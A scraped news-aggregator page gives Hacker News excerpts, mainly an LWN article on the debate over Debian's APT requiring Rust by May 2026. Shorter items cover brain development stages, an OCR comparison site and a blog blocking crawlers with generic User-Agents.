From 32 years, the brain architecture appears to stabilise compared with previous phases, corresponding with a “plateau in intelligence and personality” based on other studies. Brain regions also become more compartmentalised.

The final two turning points were defined by decreases in brain connectivity, which were believed to be related to ageing and degeneration of white matter in the brain.

...

Read the original on www.theguardian.com »

8 224 shares, 26 trendiness

APT Rust requirement raises questions

It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian’s Advanced Package Tool (APT) can have far-reaching effects. For example, Julian Andres Klode’s declaration that APT would require Rust in May 2026 means that a few of Debian’s unofficial ports must either acquire a working Rust toolchain or depend on an old version of APT. This has raised several questions within the project, particularly about the ability of a single maintainer to make changes that have widespread impact.

On October 31, Klode sent an announcement to the debian-devel mailing list that he intended to introduce Rust dependencies and code into APT as soon as May 2026:

This extends at first to the Rust compiler and standard library, and the Sequoia ecosystem.

In particular, our code to parse .deb, .ar, .tar, and the HTTP signature verification code would strongly benefit from memory safe languages and a stronger approach to unit testing.

If you maintain a port without a working Rust toolchain, please ensure it has one within the next 6 months, or sunset the port.

Klode added this was necessary so that the project as a whole could move forward, rely on modern technologies, and not be held back by “trying to shoehorn modern software on retro computing devices”. Some Debian developers have welcomed the news. Paul Tagliamonte acknowledged that it would impact unofficial Debian ports but spoke in favor of the push toward Rust.

However, John Paul Adrian Glaubitz complained that Klode’s wording was unpleasant and that the approach was confrontational. In another message, he explained that he was not against adoption of Rust; he had worked on enabling Rust on many of the Debian architectures and helped to fix architecture-specific bugs in the Rust toolchain as well as LLVM upstream. However, the message strongly suggested there was no room for a change in plan: Klode had ended it in a way that invited no further discussion. Glaubitz was one of a few Debian developers who expressed discomfort with Klode’s communication style in the message.

Klode noted, briefly, that Rust was already a hard requirement for all Debian release architectures and ports, except for Alpha (alpha), Motorola 680x0 (m68k), PA-RISC (hppa), and SuperH (sh4), because of APT’s use of the Sequoia-PGP project’s tool to verify OpenPGP signatures. APT falls back to using the GNU Privacy Guard signature-verification tool on ports that do not have a Rust compiler. By depending directly on Rust, though, APT itself would not be available on ports without a Rust compiler. LWN recently covered the state of Linux architecture support, and the status of Rust support for each one.

None of the ports listed by Klode are among those officially supported by Debian today, or targeted for support in Debian 14 (“forky”). The sh4 port has never been officially supported, and none of the other ports have been supported since Debian 6.0. The actual impact on the ports lacking Rust is also less dramatic than it sounded at first. Glaubitz assured Antoni Boucher that the situation was less dire than it sounded, “but phrasing it that way gets more attention in the news”. Boucher is the maintainer of a GCC ahead-of-time code generator for Rust. Nothing, Glaubitz said, stops ports from using a non-Rust version of APT until Boucher and others manage to bootstrap Rust for those ports.

David Kalnischkies, who is also a major contributor to APT, suggested that if the goal is to reduce bugs, it would be better to remove the code that is used to parse the .deb, .ar, and .tar formats that Klode mentioned from APT entirely. It is only needed for two tools, he said, and the only notable use of those was by Klode’s employer, Canonical, for its Launchpad software-collaboration platform. If those were taken out of the main APT code base, then it would not matter whether they were written in Rust, Python, or another language, since the tools are not directly necessary for any given port.

Kalnischkies also questioned the claim that Rust was necessary to achieve the stronger approach to unit testing that Klode mentioned:

You can certainly do unit tests in C++, we do. The main problem is that someone has to write those tests. Like docs.

Your new solver e.g. has none (apart from our preexisting integration tests). You don’t seriously claim that is because of C++? If you don’t like GoogleTest, which is what we currently have, I could suggest doctest (as I did in previous installments). Plenty other frameworks exist with similar or different styles.

Klode has not responded to those comments yet, which is a bit unfortunate given the fact that introducing hard dependencies on Rust has an impact beyond his own work on APT. It may well be that he has good answers to the questions, but it can also give the impression that Klode is simply embracing a trend toward Rust. He is involved in the Ubuntu work to migrate from GNU Coreutils to the Rust-based uutils. The reasons given for that work, again, are around modernization and better security—but security is not automatically guaranteed simply by switching to Rust, and there are a number of other considerations.

For example, Adrian Bunk pointed out that there are a number of Debian teams, as well as tooling, that will be impacted by writing some of APT in Rust. The release notes for Debian 13 (“trixie”) mention that Debian’s infrastructure “currently has problems with rebuilding packages of types that systematically use static linking”, such as those with code written in Go and Rust. Thus, these packages will be “covered by limited security support until the infrastructure is improved to deal with them maintainably”. Limited security support means that updates to Rust libraries are likely to only be released when Debian publishes a point release, which happens about every two months. The security team has specifically stated that APT is fully supported, but there are still outstanding problems.

Due to the static-linking issue, any time one of the Sequoia tool’s dependencies, currently more than 40 Rust crates, has to be rebuilt due to a security issue, the tool itself (at least potentially) also needs to be rebuilt. There are also difficulties in tracking CVEs for all of its dependencies, and understanding when a security vulnerability in a Rust crate may require updating a Rust program that depends on it.

Fabian Grünbichler, a maintainer of Debian’s Rust toolchain, listed several outstanding problems Debian has in dealing with Rust packages. One of the largest is the need for a consistent Debian policy for declaring statically linked libraries. In 2022, Guillem Jover added a control field for Debian packages called Static-Built-Using (SBU), which lists the source packages used to build a binary package. This indicates when a binary package needs to be rebuilt due to an update in another source package. Without declaring the SBUs, it may not be clear whether a binary that statically links dozens of Rust crates needs to be updated when one of those crates is. Debian has been working on a policy requirement for SBU since April 2024, but it is not yet finished or adopted.
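
For illustration, a declaration using that field might look like the following stanza; the package name, crate packages, and versions are invented, and only the Static-Built-Using field itself is the mechanism described above:

Package: example-verifier
Static-Built-Using: rust-base64 (= 0.21.7-1), rust-sha2 (= 0.10.8-1)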

The discussion sparked by Grünbichler makes clear that most of Debian’s Rust-related problems are in the process of being solved. However, there’s no evidence that Klode explored the problems before declaring that APT would depend on Rust, or even asked “is this a reasonable time frame to introduce this dependency?”

Debian’s tagline, or at least one of its taglines, is “the universal operating system”, meaning that the project aims to run on a wide variety of hardware (old and new) and be usable on the desktop, server, IoT devices, and more. The “Why Debian” page lists a number of reasons users and developers should choose the distribution: multiple hardware architectures, long-term support, and its democratic governance structure are just a few of the arguments it puts forward in favor of Debian. It also notes that “Debian cannot be controlled by a single company”. A single developer employed by a company to work on Debian tools pushing a change that seems beneficial to that company, without discussion or debate, that impacts multiple hardware architectures and that requires other volunteers to do unplanned work or meet an artificial deadline seems to go against many of the project’s stated values.

Debian, of course, does have checks and balances that could be employed if other Debian developers feel it necessary. Someone could, for example, appeal to Debian’s Technical Committee, or sponsor a general resolution to override a developer if they cannot be persuaded by discussion alone. That happened recently when the committee required systemd maintainers to continue providing a directory “until a satisfactory migration of impacted software has occurred and Policy updated accordingly”.

However, it also seems fair to point out that Debian can move slowly, even glacially, at times. APT added support for the DEB822 format for its source-information lists in 2015. Despite APT supporting that format for years, Klode faced resistance in 2021 when he pushed for Debian to move to the new format ahead of the Debian 12 (“bookworm”) release, but was unsuccessful. It is now the default for trixie with the move to APT 3.0, though APT will continue to support the old format for years to come.
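
For readers who have not seen the newer format, a minimal DEB822-style sources file looks like this (the paths and suites are illustrative and vary by system):

# /etc/apt/sources.list.d/debian.sources
Types: deb
URIs: http://deb.debian.org/debian
Suites: trixie trixie-updates
Components: main
Signed-By: /usr/share/keyrings/debian-archive-keyring.gpg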

The fact is, regardless of what Klode does with APT, more and more free software is being written (or rewritten) in Rust. Making it easier to support that software when it is packaged for Debian is to everyone’s benefit. Perhaps the project needs some developers who will be aggressive about pushing the project to move more quickly in improving its support for Rust. However, what is really needed is more developers lending a hand to do the work that is needed to support Rust in Debian and elsewhere. It does not seem in keeping with Debian’s community focus for a single developer to simply declare dependencies that other volunteers will have to scramble to support.

...

Read the original on lwn.net »

9 202 shares, 8 trendiness

OCR Arena

Upload an image to start an anonymous OCR battle.

...

Read the original on www.ocrarena.ai »

10 198 shares, 4 trendiness

You're using a tool with a too-generic User-Agent

You’re probably reading this page because you’ve attempted to access some part of my blog (Wandering Thoughts) or CSpace, the wiki thing it’s part of. Unfortunately, whatever you’re using to do so has a HTTP User-Agent header value that is too generic or otherwise excessively suspicious. As of early 2025 there’s a plague of high-volume crawlers (apparently in part to gather data for LLM training) that behave like this, so to reduce the load on Wandering Thoughts I’m experimenting with (attempting to) block all of them, and you’ve run into this.

All HTTP User-Agent headers should clearly identify what they are, and for non-browser user agents, they should identify not just the software involved but also who specifically is using that software. An extremely generic value such as “Go-http-client/1.1” is not something that I consider acceptable any more.
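
For non-browser tools, the fix is usually a single header. A minimal sketch in Python; the agent string and contact address are placeholders to adapt for your own tool:

import urllib.request

req = urllib.request.Request(
    "https://utcc.utoronto.ca/~cks/space/blog/",
    # Identify the software and who runs it, as the page asks.
    headers={"User-Agent": "myfeedreader/1.0 (+https://example.com/contact)"},
)
with urllib.request.urlopen(req) as resp:
    print(resp.status, len(resp.read()))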

...

Read the original on utcc.utoronto.ca »

If you visit 10HN only rarely, check out the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.